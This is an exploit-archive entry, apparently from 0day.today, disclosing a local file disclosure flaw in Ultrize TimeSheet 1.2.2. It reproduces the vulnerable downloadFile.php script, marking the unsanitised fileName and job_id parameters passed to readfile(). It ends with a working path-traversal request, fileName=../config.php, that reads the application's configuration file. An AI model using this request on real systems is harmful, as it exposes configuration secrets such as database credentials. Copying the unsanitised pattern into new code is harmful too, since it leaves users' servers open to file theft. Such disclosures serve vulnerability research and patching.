Ultrize TimeSheet 1.2.2 readfile() Local File Disclosure Vulnerability

2009-07-30T00:00:00
ID 1337DAY-ID-5576
Type zdt
Reporter GoLd_M
Modified 2009-07-30T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
Ultrize TimeSheet 1.2.2 readfile() Local File Disclosure Vulnerability
======================================================================



Ultrize TimeSheet 1.2.2 readfile() Local File Disclosure Vulnerability
Code page  /actions/downloadFile.php

====
<?php
//** This script performs the actual file download

$fileName = $_REQUEST['fileName']; <--!!
$job_id = $_REQUEST['job_id']; <--!!
$fullFile = $config['upload_dir'].$job_id.'/'.$fileName; <--!!

if (file_exists($fullFile))
{
    header("Content-Type: application/octet-stream");
    header("Content-Length: ".filesize($fullFile));

    header('Content-Disposition: attachment; fileName="'.$fileName.'"');

    readfile($fullFile); <--!!
}
else
{
    header("HTTP/1.0 404 Not Found");
    print "<h1>File not found. </h1>";
    print $fileName;
    print "<hr>Please make sure your file paths are correct: {$config['upload_dir']}/{$job_id}/$fileName}<br />";
}

?>
====

Poc
/actions/downloadFile.php?fileName=../config.php




#  0day.today [2018-03-19]  #